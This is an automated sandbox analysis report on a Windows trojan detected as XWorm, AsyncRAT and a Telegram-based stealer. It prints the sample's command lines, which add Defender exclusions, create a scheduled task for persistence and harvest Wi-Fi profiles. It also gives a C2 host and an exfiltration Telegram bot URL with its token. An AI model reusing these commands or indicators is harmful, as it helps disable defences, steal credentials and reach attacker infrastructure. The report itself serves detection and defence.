Windows Analysis Report
yt7dW9nyJK.exe

Overview

General Information

Sample name:yt7dW9nyJK.exe
renamed because original name is a hash value
Original sample name:adbe420a49db30f75d4665ea0014af43.exe
Analysis ID:1479415
MD5:adbe420a49db30f75d4665ea0014af43
SHA1:ed38f3bf9c5e56110cdf8c686bffee54128c51d6
SHA256:b851e1ad3f4882815c89fa7754ed5dc89edfc0c2ea873a83a19f65299566e46d
Tags:32, AsyncRAT, exe, trojan

Detection

WhiteSnake Stealer, XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Yara detected AntiVM3
Yara detected Telegram RAT
Yara detected WhiteSnake Stealer
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Found Tor onion address
Found many strings related to Crypto-Wallets (likely being stolen)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
May use the Tor software to hide its network traffic
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Script Execution From Temp Folder
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Uses netsh to modify the Windows network and firewall settings
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Communication To Uncommon Destination Ports
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • yt7dW9nyJK.exe (PID: 5576 cmdline: "C:\Users\user\Desktop\yt7dW9nyJK.exe" MD5: ADBE420A49DB30F75D4665EA0014AF43)
    • powershell.exe (PID: 6716 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\yt7dW9nyJK.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 1632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • yt7dW9nyJK.exe (PID: 2672 cmdline: "C:\Users\user\Desktop\yt7dW9nyJK.exe" MD5: ADBE420A49DB30F75D4665EA0014AF43)
      • powershell.exe (PID: 7352 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\yt7dW9nyJK.exe' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 7360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7504 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'yt7dW9nyJK.exe' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 7512 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • ffmaba.exe (PID: 7784 cmdline: "C:\Users\user\AppData\Local\Temp\ffmaba.exe" MD5: 4FAAFBF754FC2DAD8769BA54C564C22F)
        • powershell.exe (PID: 7876 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\ffmaba.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 7888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 8024 cmdline: "C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "ffmaba" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\user\AppData\Local\Temp\ffmaba.exe" &&START "" "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 8036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • chcp.com (PID: 8084 cmdline: chcp 65001 MD5: 20A59FB950D8A191F7D35C4CA7DA9CAF)
          • timeout.exe (PID: 8108 cmdline: timeout /t 3 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
          • schtasks.exe (PID: 320 cmdline: schtasks /create /tn "ffmaba" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe" /rl HIGHEST /f MD5: 48C2FE20575769DE916F48EF0676A965)
          • ffmaba.exe (PID: 5624 cmdline: "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe" MD5: 4FAAFBF754FC2DAD8769BA54C564C22F)
            • powershell.exe (PID: 7236 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
              • conhost.exe (PID: 7100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • tor-real.exe (PID: 7576 cmdline: "C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe" -f "C:\Users\user\AppData\Local\77rh3rhsc7\tor\torrc.txt" MD5: 07244A2C002FFDF1986B454429EACE0B)
              • conhost.exe (PID: 7616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • cmd.exe (PID: 5380 cmdline: "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
              • conhost.exe (PID: 572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • chcp.com (PID: 7988 cmdline: chcp 65001 MD5: 20A59FB950D8A191F7D35C4CA7DA9CAF)
              • netsh.exe (PID: 7956 cmdline: netsh wlan show profiles MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
              • findstr.exe (PID: 8172 cmdline: findstr /R /C:"[ ]:[ ]" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
            • cmd.exe (PID: 7920 cmdline: "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
              • conhost.exe (PID: 7888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • chcp.com (PID: 7780 cmdline: chcp 65001 MD5: 20A59FB950D8A191F7D35C4CA7DA9CAF)
              • netsh.exe (PID: 7800 cmdline: netsh wlan show networks mode=bssid MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
              • findstr.exe (PID: 7816 cmdline: findstr "SSID BSSID Signal" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
  • ffmaba.exe (PID: 2300 cmdline: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe MD5: 4FAAFBF754FC2DAD8769BA54C564C22F)
    • powershell.exe (PID: 6096 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 4676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • ffmaba.exe (PID: 4616 cmdline: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe MD5: 4FAAFBF754FC2DAD8769BA54C564C22F)
    • powershell.exe (PID: 7420 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • ffmaba.exe (PID: 5260 cmdline: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe MD5: 4FAAFBF754FC2DAD8769BA54C564C22F)
    • powershell.exe (PID: 6104 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 5080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • ffmaba.exe (PID: 6432 cmdline: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe MD5: 4FAAFBF754FC2DAD8769BA54C564C22F)
    • powershell.exe (PID: 5796 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 2380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
{"C2 url": ["securefirewall.portmap.io"], "Port": "31510", "Aes key": "<19670122>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.2"}
{"C2 url": "https://api.telegram.org/bot7418591347:AAEKXYhE74Nv1aE3mDgf4CpgdjKv5Zj4PmU/sendMessage"}
Source | Rule | Description | Author | Strings
00000000.00000002.2068698381.00000000025CB000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
00000000.00000002.2068698381.00000000025CB000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security
00000000.00000002.2068698381.00000000025CB000.00000004.00000800.00020000.00000000.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0x601f0:$s6: VirtualBox
  • 0x73ad0:$s6: VirtualBox
  • 0x87940:$s6: VirtualBox
  • 0x6014e:$s8: Win32_ComputerSystem
  • 0x73a2e:$s8: Win32_ComputerSystem
  • 0x8789e:$s8: Win32_ComputerSystem
  • 0x63184:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x76a64:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x8a8d4:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x63221:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x76b01:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x8a971:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x63336:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x76c16:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x8aa86:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x62630:$cnc4: POST / HTTP/1.1
  • 0x75f10:$cnc4: POST / HTTP/1.1
  • 0x89d80:$cnc4: POST / HTTP/1.1
00000004.00000002.4513293791.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
00000004.00000002.4502635576.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security

Source | Rule | Description | Author | Strings
4.2.yt7dW9nyJK.exe.400000.0.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
4.2.yt7dW9nyJK.exe.400000.0.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
4.2.yt7dW9nyJK.exe.400000.0.unpack | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0xe130:$s6: VirtualBox
  • 0xe08e:$s8: Win32_ComputerSystem
  • 0x110c4:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x11161:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x11276:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x10570:$cnc4: POST / HTTP/1.1
0.2.yt7dW9nyJK.exe.261d0c0.0.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
0.2.yt7dW9nyJK.exe.261d0c0.0.unpack | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0xc330:$s6: VirtualBox
  • 0xc28e:$s8: Win32_ComputerSystem
  • 0xf2c4:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0xf361:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0xf476:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0xe770:$cnc4: POST / HTTP/1.1

                System Summary

                Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "ffmaba" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\user\AppData\Local\Temp\ffmaba.exe" &&START "" "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe", CommandLine: "C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "ffmaba" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\user\AppData\Local\Temp\ffmaba.exe" &&START "" "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\ffmaba.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\ffmaba.exe, ParentProcessId: 7784, ParentProcessName: ffmaba.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "ffmaba" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\user\AppData\Local\Temp\ffmaba.exe" &&START "" "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe", ProcessId: 8024, ProcessName: cmd.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\yt7dW9nyJK.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\yt7dW9nyJK.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\yt7dW9nyJK.exe", ParentImage: C:\Users\user\Desktop\yt7dW9nyJK.exe, ParentProcessId: 5576, ParentProcessName: yt7dW9nyJK.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\yt7dW9nyJK.exe", ProcessId: 6716, ProcessName: powershell.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\ffmaba.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\ffmaba.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\ffmaba.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\ffmaba.exe, ParentProcessId: 7784, ParentProcessName: ffmaba.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\ffmaba.exe", ProcessId: 7876, ProcessName: powershell.exe
                Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\yt7dW9nyJK.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\yt7dW9nyJK.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\yt7dW9nyJK.exe", ParentImage: C:\Users\user\Desktop\yt7dW9nyJK.exe, ParentProcessId: 2672, ParentProcessName: yt7dW9nyJK.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\yt7dW9nyJK.exe', ProcessId: 7352, ProcessName: powershell.exe
                Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 185.119.118.59, DestinationIsIpv6: false, DestinationPort: 8080, EventID: 3, Image: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe, Initiated: true, ProcessId: 5624, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49726
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks /create /tn "ffmaba" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe" /rl HIGHEST /f , CommandLine: schtasks /create /tn "ffmaba" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe" /rl HIGHEST /f , CommandLine|base64offset|contains: mj,, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "ffmaba" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\user\AppData\Local\Temp\ffmaba.exe" &&START "" "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 8024, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /create /tn "ffmaba" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe" /rl HIGHEST /f , ProcessId: 320, ProcessName: schtasks.exe
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\yt7dW9nyJK.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\yt7dW9nyJK.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\yt7dW9nyJK.exe", ParentImage: C:\Users\user\Desktop\yt7dW9nyJK.exe, ParentProcessId: 5576, ParentProcessName: yt7dW9nyJK.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\yt7dW9nyJK.exe", ProcessId: 6716, ProcessName: powershell.exe

                Stealing of Sensitive Information

                Source: Process startedAuthor: Joe Security: Data: Command: "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]", CommandLine: "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe" , ParentImage: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe, ParentProcessId: 5624, ParentProcessName: ffmaba.exe, ProcessCommandLine: "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]", ProcessId: 5380, ProcessName: cmd.exe
                No Snort rule has matched
                Timestamp:2024-07-23T15:48:17.144145+0200
                SID:2852870
                Source Port:31510
                Destination Port:49707
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:49:08.115309+0200
                SID:2852870
                Source Port:31510
                Destination Port:49707
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:49:00.111643+0200
                SID:2852870
                Source Port:31510
                Destination Port:49707
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:47:18.704467+0200
                SID:2522818
                Source Port:9993
                Destination Port:49730
                Protocol:TCP
                Classtype:Misc Attack
                Timestamp:2024-07-23T15:47:14.425934+0200
                SID:2522164
                Source Port:8443
                Destination Port:49725
                Protocol:TCP
                Classtype:Misc Attack
                Timestamp:2024-07-23T15:47:29.089437+0200
                SID:2852870
                Source Port:31510
                Destination Port:49707
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:51:08.101444+0200
                SID:2852870
                Source Port:31510
                Destination Port:49707
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:47:55.809501+0200
                SID:2852923
                Source Port:49707
                Destination Port:31510
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:50:35.053785+0200
                SID:2852923
                Source Port:49707
                Destination Port:31510
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:49:30.643021+0200
                SID:2852923
                Source Port:49707
                Destination Port:31510
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:50:17.025178+0200
                SID:2852870
                Source Port:31510
                Destination Port:49707
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:50:55.344407+0200
                SID:2852870
                Source Port:31510
                Destination Port:49707
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:49:51.219704+0200
                SID:2852870
                Source Port:31510
                Destination Port:49707
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:48:42.994902+0200
                SID:2852870
                Source Port:31510
                Destination Port:49707
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-23T15:49:41.798109+0200
                SID:2852870
                Source Port:31510
                Destination Port:49707
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected


                AV Detection

                Source: 00000000.00000002.2068698381.00000000025CB000.00000004.00000800.00020000.00000000.sdmp, Malware Configuration Extractor: Xworm {"C2 url": ["securefirewall.portmap.io"], "Port": "31510", "Aes key": "<19670122>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.2"}
                Source: ffmaba.exe.5624.19.memstrmin, Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7418591347:AAEKXYhE74Nv1aE3mDgf4CpgdjKv5Zj4PmU/sendMessage"}
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe, ReversingLabs: Detection: 45%
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe, ReversingLabs: Detection: 45%
                Source: yt7dW9nyJK.exe, ReversingLabs: Detection: 42%
                Source: Submited Sample, Integrated Neural Analysis Model: Matched 100.0% probability
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe, Joe Sandbox ML: detected
                Source: yt7dW9nyJK.exe, Joe Sandbox ML: detected
                Source: 0.2.yt7dW9nyJK.exe.26309a0.1.raw.unpack, String decryptor: securefirewall.portmap.io
                Source: 0.2.yt7dW9nyJK.exe.26309a0.1.raw.unpack, String decryptor: 31510
                Source: 0.2.yt7dW9nyJK.exe.26309a0.1.raw.unpack, String decryptor: <19670122>
                Source: 0.2.yt7dW9nyJK.exe.26309a0.1.raw.unpack, String decryptor: <Xwormmm>
                Source: 0.2.yt7dW9nyJK.exe.26309a0.1.raw.unpack, String decryptor: XWorm V5.2
                Source: 0.2.yt7dW9nyJK.exe.26309a0.1.raw.unpack, String decryptor: USB.exe
